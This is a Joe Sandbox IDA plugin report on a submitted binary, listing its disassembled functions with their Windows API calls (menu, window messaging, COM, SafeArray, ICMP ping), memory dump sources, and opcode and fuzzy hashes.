                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                              • String ID: static
                                              • API String ID: 2559357485-2160076837
                                              • Opcode ID: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                              • Instruction ID: 776f3085788f1a3168f006a1c579c28191331c068179fd6639a5b8e6d9986b2a
                                              • Opcode Fuzzy Hash: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                              • Instruction Fuzzy Hash: 40319231105115BBDF119F64DC19FEBBBA9FF19324F114266FA16922E0EB31D811DB60
                                              Function 00B76E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B76E3E
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              • __gmtime64_s.LIBCMT ref: 00B76ED7
                                              • __gmtime64_s.LIBCMT ref: 00B76F0D
                                              • __gmtime64_s.LIBCMT ref: 00B76F2A
                                              • __allrem.LIBCMT ref: 00B76F80
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76F9C
                                              • __allrem.LIBCMT ref: 00B76FB3
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76FD1
                                              • __allrem.LIBCMT ref: 00B76FE8
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B77006
                                              • __invoke_watson.LIBCMT ref: 00B77077
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                              • Instruction ID: 971e340617294d8811cb2ad45ae647be3a8a559877337b8f2cc689f7f1b3ab1d
                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                              • Instruction Fuzzy Hash: 3171E876A40B17ABD714AE78DC81B5AB3E4EF04724F14C5B9F528D7291EB70DE408790
                                              Function 00BB2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2542
                                              • GetMenuItemInfoW.USER32(00C15890,000000FF,00000000,00000030), ref: 00BB25A3
                                              • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB25D9
                                              • Sleep.KERNEL32(000001F4), ref: 00BB25EB
                                              • GetMenuItemCount.USER32(?), ref: 00BB262F
                                              • GetMenuItemID.USER32(?,00000000), ref: 00BB264B
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00BB2675
                                              • GetMenuItemID.USER32(?,?), ref: 00BB26BA
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BB2700
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2714
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2735
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                              • Instruction ID: 3dee1b787c799db79a7ba2e9c1b675e3a956179ba104286d07b894d610e369ad
                                              • Opcode Fuzzy Hash: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                              • Instruction Fuzzy Hash: A0618D7090024AAFDF21CF64DC98EFEBBF8EB45308F144599E842A7251DBB1AD05DB21
                                              Function 00BD6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BD6FA5
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BD6FA8
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BD6FCC
                                              • _memset.LIBCMT ref: 00BD6FDD
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BD6FEF
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BD7067
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                              • Instruction ID: c7d36b6eb51e5c8602c5d572ff233c49ce0c7f4089db78496b41c8131c1dd829
                                              • Opcode Fuzzy Hash: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                              • Instruction Fuzzy Hash: 86616D75940208AFDB11DFA4CC81FEEB7F8EB49710F14419AFA14AB3A1E771A941DB90
                                              Function 00BA6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BA6BBF
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00BA6C18
                                              • VariantInit.OLEAUT32(?), ref: 00BA6C2A
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BA6C4A
                                              • VariantCopy.OLEAUT32(?,?), ref: 00BA6C9D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BA6CB1
                                              • VariantClear.OLEAUT32(?), ref: 00BA6CC6
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00BA6CD3
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CDC
                                              • VariantClear.OLEAUT32(?), ref: 00BA6CEE
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                              • Instruction ID: 4b845bba5bad86115ddc61230d6f8a5b29c64b39d8dde6f097707dfd42d868d8
                                              • Opcode Fuzzy Hash: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                              • Instruction Fuzzy Hash: 37413F75A04219EFCF00DF68D8549AEBBF9EF09354F0480A9E956E7361DB30A945CFA0
                                              Function 00BC5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00BC5793
                                              • inet_addr.WS2_32(?), ref: 00BC57D8
                                              • gethostbyname.WS2_32(?), ref: 00BC57E4
                                              • IcmpCreateFile.IPHLPAPI ref: 00BC57F2
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5862
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5878
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BC58ED
                                              • WSACleanup.WS2_32 ref: 00BC58F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: 6d94967184ac94953e1e58adc0369c91e53942405ce13dd71ec7f38e4baf2cf3
                                              • Instruction ID: 4c1018e77bf952599008184b5cad816df8191ce769f7bf3280969b9c4e38f2d5
                                              • Opcode Fuzzy Hash: 6d94967184ac94953e1e58adc0369c91e53942405ce13dd71ec7f38e4baf2cf3
                                              • Instruction Fuzzy Hash: 46516F316047019FDB209F24DC95F6AB7E4EF48710F0485AAF996DB2A1DB70E844DB51
                                              Function 00BBB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBB4D0
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BBB546
                                              • GetLastError.KERNEL32 ref: 00BBB550
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00BBB5BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 682ef9b26280c19b5901e0164e83ff801582bce68743a8d2c8f41a509aaf96ff
                                              • Instruction ID: 2efe9442d699f94626e00bcf5335622845079d8dc4c51f322de4c7b04731d85c
                                              • Opcode Fuzzy Hash: 682ef9b26280c19b5901e0164e83ff801582bce68743a8d2c8f41a509aaf96ff
                                              • Instruction Fuzzy Hash: 1E316F75A00209DBCB20EB68CCA5FFDB7F4EF14311F1441A6E90597291DBF09A45CB52
                                              Function 00BA8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BA9014
                                              • GetDlgCtrlID.USER32 ref: 00BA901F
                                              • GetParent.USER32 ref: 00BA903B
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA903E
                                              • GetDlgCtrlID.USER32(?), ref: 00BA9047
                                              • GetParent.USER32(?), ref: 00BA9063
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA9066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 9368534811273819b0ca38611a47153d20929dbdcb8fb585bb8d5c950b194e6a
                                              • Instruction ID: 74143a514924df24d5b739906977eca92bd739069cda8c36cac6b25accbe0439
                                              • Opcode Fuzzy Hash: 9368534811273819b0ca38611a47153d20929dbdcb8fb585bb8d5c950b194e6a
                                              • Instruction Fuzzy Hash: E9210870A04105BFDF15ABA0CC95EFEB7B4EF49310F0041A6B912972F1DF359818DA20
                                              Function 00BA907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BA90FD
                                              • GetDlgCtrlID.USER32 ref: 00BA9108
                                              • GetParent.USER32 ref: 00BA9124
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA9127
                                              • GetDlgCtrlID.USER32(?), ref: 00BA9130
                                              • GetParent.USER32(?), ref: 00BA914C
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA914F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 58c38e3b94a2c566ea4e6c94c77fc72febcd95f984abba9b267ab774380d47e0
                                              • Instruction ID: d1240ed463ae7a76c0257a659d7c53319cc12bdd524e845f26391371c5fbffc7
                                              • Opcode Fuzzy Hash: 58c38e3b94a2c566ea4e6c94c77fc72febcd95f984abba9b267ab774380d47e0
                                              • Instruction Fuzzy Hash: 1E21F574A04109BBDF15ABA0CC95EFEBBF4EF49300F0041A6B911A72E1EB759819DB20
                                              Function 00BA9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32 ref: 00BA916F
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00BA9184
                                              • _wcscmp.LIBCMT ref: 00BA9196
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BA9211
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
                                              • Instruction ID: b8e42bb1a85ca20b1b51664281d1897e1ded1e9cbe8bdc0f1732197871014d32
                                              • Opcode Fuzzy Hash: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
                                              • Instruction Fuzzy Hash: 8111593664C307BAFA182624EC0BEB777DCDB12720B2001A7F914E14D1FE616C51A990
                                              Function 00BC88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BC88D7
                                              • CoInitialize.OLE32(00000000), ref: 00BC8904
                                              • CoUninitialize.COMBASE ref: 00BC890E
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00BC8A0E
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BC8B3B
                                              • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,00BE2C0C), ref: 00BC8B6F
                                              • CoGetObject.OLE32(?,00000000,00BE2C0C,?), ref: 00BC8B92
                                              • SetErrorMode.KERNEL32(00000000), ref: 00BC8BA5
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BC8C25
                                              • VariantClear.OLEAUT32(?), ref: 00BC8C35
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: ccc1c9b85c7ea48ccbf364a58e3c086966ad9de36a241899a4d8d72e4f54b989
                                              • Instruction ID: 0c9f5600a5026fb0333dcc300edae783c04e64e71ba1fddc3c76e671b864786e
                                              • Opcode Fuzzy Hash: ccc1c9b85c7ea48ccbf364a58e3c086966ad9de36a241899a4d8d72e4f54b989
                                              • Instruction Fuzzy Hash: 89C1F2B1608305AFD700DF64C884E2AB7E9EF89748F04499DF98A9B261DB71ED05CB52
                                              Function 00BB7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BB7A6C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ArraySafeVartype
                                              • String ID:
                                              • API String ID: 1725837607-0
                                              • Opcode ID: 1b28845ebb6005346a347d9440683b472ad38316f2a7969fef85f3f0eb80723c
                                              • Instruction ID: 09be4dc35d9350e02e55fd3475957bd547748a19fd82967d936e305294226c9f
                                              • Opcode Fuzzy Hash: 1b28845ebb6005346a347d9440683b472ad38316f2a7969fef85f3f0eb80723c
                                              • Instruction Fuzzy Hash: 2AB1927194821A9FDB10DFA4C894BFEBBF4EF89321F1044A9E551E7241DBB4E941CB90
                                              Function 00B5FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B5FAA6
                                              • OleUninitialize.OLE32(?,00000000), ref: 00B5FB45
                                              • UnregisterHotKey.USER32(?), ref: 00B5FC9C
                                              • DestroyWindow.USER32(?), ref: 00B945D6
                                              • FreeLibrary.KERNEL32(?), ref: 00B9463B
